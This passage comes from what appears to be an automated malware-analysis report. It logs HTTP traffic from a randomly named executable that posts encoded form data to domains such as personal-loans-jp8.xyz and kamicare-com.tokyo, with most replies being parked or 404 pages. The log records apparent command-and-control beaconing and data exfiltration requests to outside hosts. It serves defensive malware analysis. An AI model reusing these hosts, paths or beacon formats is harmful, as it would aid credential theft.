                                        x-request-id: afedea78-a9d3-4676-807a-369db58ac62b
                                        cache-control: no-store, max-age=0
                                        accept-ch: sec-ch-prefers-color-scheme
                                        critical-ch: sec-ch-prefers-color-scheme
                                        vary: sec-ch-prefers-color-scheme
                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==
                                        set-cookie: parking_session=afedea78-a9d3-4676-807a-369db58ac62b; expires=Tue, 27 Aug 2024 06:59:23 GMT; path=/
                                        connection: close
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 66 71 49 34 42 2f 48 63 56 7a 45 59 4a 5a 76 76 44 4e 47 5a 32 74 4b 33 7a 6f 52 30 7a 4c 4f 6e 43 43 62 30 4e 67 38 59 44 4b 33 56 2b 2f 6c 6b 6e 4a 4e 70 4a 75 4b 32 51 46 74 39 35 56 38 55 6b 47 48 71 37 57 4e 57 52 6c 34 4e 66 51 64 55 5a 62 31 45 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                        Aug 27, 2024 08:44:23.968770981 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWZlZGVhNzgtYTlkMy00Njc2LTgwN2EtMzY5ZGI1OGFjNjJiIiwicGFnZV90aW1lIjoxNzI0NzQxMD


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        42192.168.2.651240199.59.243.226805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:26.068656921 CEST885OUTPOST /osae/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.personal-loans-jp8.xyz
                                        Origin: http://www.personal-loans-jp8.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.personal-loans-jp8.xyz/osae/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 58 68 75 4d 32 35 32 51 76 53 33 35 41 48 63 37 46 53 71 76 43 52 6a 63 6d 7a 5a 61 59 30 70 31 35 4c 54 5a 58 47 79 34 70 43 63 35 57 71 76 49 75 30 51 50 6e 62 54 36 52 48 74 5a 52 4d 74 57 5a 4a 66 31 4a 65 4d 70 44 32 46 77 64 43 58 6b 46 2b 4e 38 46 6a 77 64 44 39 46 31 6f 43 42 5a 5a 63 64 32 61 49 48 5a 2b 48 55 6c 35 57 39 66 47 4c 75 63 4f 38 58 4b 79 64 68 59 61 2f 4a 6b 2f 6c 68 49 32 6b 75 71 41 49 72 4b 44 50 63 59 2f 62 47 48 2f 36 4d 6f 73 76 2b 32 74 51 43 68 79 6c 57 46 73 4b 62 4e 42 43 6e 78 58 39 7a 31 74 6f 53 70 6b 52 4f 73 6e 37 74 34 73 39 4f 67 59 54 6d 61 2f 55 75 59 78 4c 6a 77 63 33 75 47 54 72 37 48 64 79 57 43 32 30 6f 5a 65 31 44 61 4c 41 3d 3d
                                        Data Ascii: mvjDMBx8=XhuM252QvS35AHc7FSqvCRjcmzZaY0p15LTZXGy4pCc5WqvIu0QPnbT6RHtZRMtWZJf1JeMpD2FwdCXkF+N8FjwdD9F1oCBZZcd2aIHZ+HUl5W9fGLucO8XKydhYa/Jk/lhI2kuqAIrKDPcY/bGH/6Mosv+2tQChylWFsKbNBCnxX9z1toSpkROsn7t4s9OgYTma/UuYxLjwc3uGTr7HdyWC20oZe1DaLA==
                                        Aug 27, 2024 08:44:26.541621923 CEST1236INHTTP/1.1 200 OK
                                        date: Tue, 27 Aug 2024 06:44:25 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 1154
                                        x-request-id: 2ba5a5ac-82ae-41f2-996b-b0d8e2107f87
                                        cache-control: no-store, max-age=0
                                        accept-ch: sec-ch-prefers-color-scheme
                                        critical-ch: sec-ch-prefers-color-scheme
                                        vary: sec-ch-prefers-color-scheme
                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==
                                        set-cookie: parking_session=2ba5a5ac-82ae-41f2-996b-b0d8e2107f87; expires=Tue, 27 Aug 2024 06:59:26 GMT; path=/
                                        connection: close
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 66 71 49 34 42 2f 48 63 56 7a 45 59 4a 5a 76 76 44 4e 47 5a 32 74 4b 33 7a 6f 52 30 7a 4c 4f 6e 43 43 62 30 4e 67 38 59 44 4b 33 56 2b 2f 6c 6b 6e 4a 4e 70 4a 75 4b 32 51 46 74 39 35 56 38 55 6b 47 48 71 37 57 4e 57 52 6c 34 4e 66 51 64 55 5a 62 31 45 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                        Aug 27, 2024 08:44:26.541640043 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmJhNWE1YWMtODJhZS00MWYyLTk5NmItYjBkOGUyMTA3Zjg3IiwicGFnZV90aW1lIjoxNzI0NzQxMD


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        43192.168.2.651241199.59.243.226805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:28.616971016 CEST1898OUTPOST /osae/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.personal-loans-jp8.xyz
                                        Origin: http://www.personal-loans-jp8.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.personal-loans-jp8.xyz/osae/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 58 68 75 4d 32 35 32 51 76 53 33 35 41 48 63 37 46 53 71 76 43 52 6a 63 6d 7a 5a 61 59 30 70 31 35 4c 54 5a 58 47 79 34 70 43 45 35 57 59 58 49 38 6c 51 50 6d 62 54 36 63 6e 74 63 52 4d 74 78 5a 50 32 39 4a 65 41 54 44 31 78 77 65 68 76 6b 44 50 4e 38 65 54 77 64 4b 64 46 77 33 53 42 4d 5a 64 74 49 61 4a 33 5a 2b 48 55 6c 35 51 35 66 43 66 36 63 49 38 58 4a 69 4e 68 55 51 66 4a 49 2f 6c 49 31 32 6b 71 41 42 35 4c 4b 4e 50 4d 59 35 70 2b 48 38 61 4d 6d 74 76 2b 75 74 51 4f 2b 79 6c 4b 34 73 4f 61 67 42 41 37 78 56 4d 47 78 34 4b 58 2b 34 44 4b 54 30 4a 4a 2b 6b 4e 44 58 55 54 57 4a 34 47 75 43 33 61 4c 48 55 51 54 46 58 4b 44 46 56 51 47 63 79 6b 64 54 63 47 47 75 61 38 76 6f 75 4a 4e 7a 33 64 31 49 41 6a 53 6a 46 4d 71 61 43 33 45 56 42 46 6b 6b 4d 35 44 68 42 78 35 2f 6b 58 51 4c 54 53 74 4c 35 4b 69 38 6d 65 4c 44 51 4a 58 51 4f 42 79 59 4c 61 55 77 64 74 61 53 44 79 71 2b 51 50 46 4c 47 66 58 59 4a 42 48 70 4c 47 4e 4c 65 53 56 78 75 45 63 59 69 77 58 6e 6c 48 2f 39 70 [TRUNCATED]
                                        Data Ascii: mvjDMBx8=XhuM252QvS35AHc7FSqvCRjcmzZaY0p15LTZXGy4pCE5WYXI8lQPmbT6cntcRMtxZP29JeATD1xwehvkDPN8eTwdKdFw3SBMZdtIaJ3Z+HUl5Q5fCf6cI8XJiNhUQfJI/lI12kqAB5LKNPMY5p+H8aMmtv+utQO+ylK4sOagBA7xVMGx4KX+4DKT0JJ+kNDXUTWJ4GuC3aLHUQTFXKDFVQGcykdTcGGua8vouJNz3d1IAjSjFMqaC3EVBFkkM5DhBx5/kXQLTStL5Ki8meLDQJXQOByYLaUwdtaSDyq+QPFLGfXYJBHpLGNLeSVxuEcYiwXnlH/9pJ+MfwR+iedAivpcC0cZKAJmnTIokhVgEeC/I3zLJmDtsUEFKnHP2ghh5Qjg1xIx5lxC1zvhGIV+jbH0puhUEotQPwo1AgVRgTt/Emd7EcrIdRqSbUdaNbDwZXGQh/z2X7iy/J2ccdJWfiTm8PDDrh3uzmwHXljTjl6F83rXAxJuH4CYS9bp3r1QDAeMfMBTdBR7ZcTP1MtFb9WTNRjeeXH4YYvpMsD8cj30jjcqSVcmfw0uW2cayH9NjNpZ8GCfmWVB+dJupUJvrUbst/oGhNIP7kd9hdhVFTbz5sRoEwilWtv/UgnGd1ZnFHorDmEuql1XnLgPMLQllqGaiklWZ1+onAtLPilEiExdVAzuo1uq0+oLcH4iFOMsEOyXfFlwtH9BLcZJo9jT/aBcr51ja3jWAGXBXdlgOEQsbN0GIY5FYsUlP+LY5nfuAb5pUN+b8BFUggZKepQTi5wyDIgxBFbA5pk9IjRBHQA1Mlp3wj6TJSXpS7lRF5Hk+fUn2tzJOjQO1rPr813JVWI1eesqsaHYsvj2RL1oI9W1dl+z7yrBpzATeUZjBS8AcJqQIwzSQNk8RabTd+PEY6Rjw71j4O2P5yFjJCpIpftbgkj/S0tx2qjAlZiFLn54RxZVSgTJ2HmYDVtf+nlhE9+2kmgv4fy3dEAWoq31SZs [TRUNCATED]
                                        Aug 27, 2024 08:44:29.065371037 CEST1236INHTTP/1.1 200 OK
                                        date: Tue, 27 Aug 2024 06:44:28 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 1154
                                        x-request-id: 9fa75aa2-caed-41ad-9f0e-d80e6fc5cbea
                                        cache-control: no-store, max-age=0
                                        accept-ch: sec-ch-prefers-color-scheme
                                        critical-ch: sec-ch-prefers-color-scheme
                                        vary: sec-ch-prefers-color-scheme
                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==
                                        set-cookie: parking_session=9fa75aa2-caed-41ad-9f0e-d80e6fc5cbea; expires=Tue, 27 Aug 2024 06:59:29 GMT; path=/
                                        connection: close
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 66 71 49 34 42 2f 48 63 56 7a 45 59 4a 5a 76 76 44 4e 47 5a 32 74 4b 33 7a 6f 52 30 7a 4c 4f 6e 43 43 62 30 4e 67 38 59 44 4b 33 56 2b 2f 6c 6b 6e 4a 4e 70 4a 75 4b 32 51 46 74 39 35 56 38 55 6b 47 48 71 37 57 4e 57 52 6c 34 4e 66 51 64 55 5a 62 31 45 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                        Aug 27, 2024 08:44:29.065395117 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWZhNzVhYTItY2FlZC00MWFkLTlmMGUtZDgwZTZmYzVjYmVhIiwicGFnZV90aW1lIjoxNzI0NzQxMD


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        44192.168.2.651242199.59.243.226805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:31.154472113 CEST593OUTGET /osae/?mvjDMBx8=ajGs1OnhgmOjGH0rS1+XMzuDhBRwUFVs9ujDJ3TY3TM9Xr/glBZes+ajendbW/hUbvaGBM0AJFcTAGb0Z858EyBkLc9l3gETAt5Zd72AqHMe/3ljZLi/M9TCgc1RD8Nq02402TA=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.personal-loans-jp8.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:44:31.610946894 CEST1236INHTTP/1.1 200 OK
                                        date: Tue, 27 Aug 2024 06:44:31 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 1554
                                        x-request-id: 8fc443d4-fedc-456c-9416-342d6aae33de
                                        cache-control: no-store, max-age=0
                                        accept-ch: sec-ch-prefers-color-scheme
                                        critical-ch: sec-ch-prefers-color-scheme
                                        vary: sec-ch-prefers-color-scheme
                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t01xJ4nqHadlOKHMXHvVk1n4tsOtinxxFS00Z7pFITK74rxE0XfcLKiSzG7sJ0kHZpvZUFQaxyiNnfNGd15EKg==
                                        set-cookie: parking_session=8fc443d4-fedc-456c-9416-342d6aae33de; expires=Tue, 27 Aug 2024 06:59:31 GMT; path=/
                                        connection: close
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 30 31 78 4a 34 6e 71 48 61 64 6c 4f 4b 48 4d 58 48 76 56 6b 31 6e 34 74 73 4f 74 69 6e 78 78 46 53 30 30 5a 37 70 46 49 54 4b 37 34 72 78 45 30 58 66 63 4c 4b 69 53 7a 47 37 73 4a 30 6b 48 5a 70 76 5a 55 46 51 61 78 79 69 4e 6e 66 4e 47 64 31 35 45 4b 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t01xJ4nqHadlOKHMXHvVk1n4tsOtinxxFS00Z7pFITK74rxE0XfcLKiSzG7sJ0kHZpvZUFQaxyiNnfNGd15EKg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                        Aug 27, 2024 08:44:31.611026049 CEST1007INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGZjNDQzZDQtZmVkYy00NTZjLTk0MTYtMzQyZDZhYWUzM2RlIiwicGFnZV90aW1lIjoxNzI0NzQxMD


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        45192.168.2.651243157.7.44.213805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:37.594671965 CEST849OUTPOST /sryw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kamicare-com.tokyo
                                        Origin: http://www.kamicare-com.tokyo
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.kamicare-com.tokyo/sryw/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 76 39 68 65 2f 6e 35 67 61 78 71 37 52 4c 71 56 55 5a 6b 77 69 31 76 57 35 72 46 4a 59 34 41 76 4d 6b 74 61 73 45 70 67 44 30 4f 47 4c 62 58 6e 42 70 69 4b 6d 46 59 43 4a 5a 79 73 78 49 67 6a 62 45 6e 56 4e 2f 66 52 6c 31 32 4a 4d 30 37 4f 79 51 76 37 30 75 41 47 70 58 4c 6a 46 31 43 50 5a 42 66 35 32 66 52 39 77 31 7a 2b 46 6f 71 35 48 30 2b 4f 47 74 58 75 33 6a 6d 51 36 44 36 46 6d 79 62 7a 64 69 76 6d 4a 44 38 78 47 50 38 70 76 76 63 2f 43 69 49 43 52 53 42 72 50 2f 59 68 77 4e 52 74 2f 33 34 41 2b 79 61 71 56 30 56 50 32 5a 78 41 79 4f 39 46 67 63 30 62 70 2f 38 71 6a 79 69 52 6f 57 71 48 58 64 58 6b
                                        Data Ascii: mvjDMBx8=v9he/n5gaxq7RLqVUZkwi1vW5rFJY4AvMktasEpgD0OGLbXnBpiKmFYCJZysxIgjbEnVN/fRl12JM07OyQv70uAGpXLjF1CPZBf52fR9w1z+Foq5H0+OGtXu3jmQ6D6FmybzdivmJD8xGP8pvvc/CiICRSBrP/YhwNRt/34A+yaqV0VP2ZxAyO9Fgc0bp/8qjyiRoWqHXdXk
                                        Aug 27, 2024 08:44:38.435836077 CEST367INHTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:44:38 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Content-Length: 203
                                        Connection: close
                                        Server: Apache
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 72 79 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        46192.168.2.651244157.7.44.213805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:40.147605896 CEST873OUTPOST /sryw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kamicare-com.tokyo
                                        Origin: http://www.kamicare-com.tokyo
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
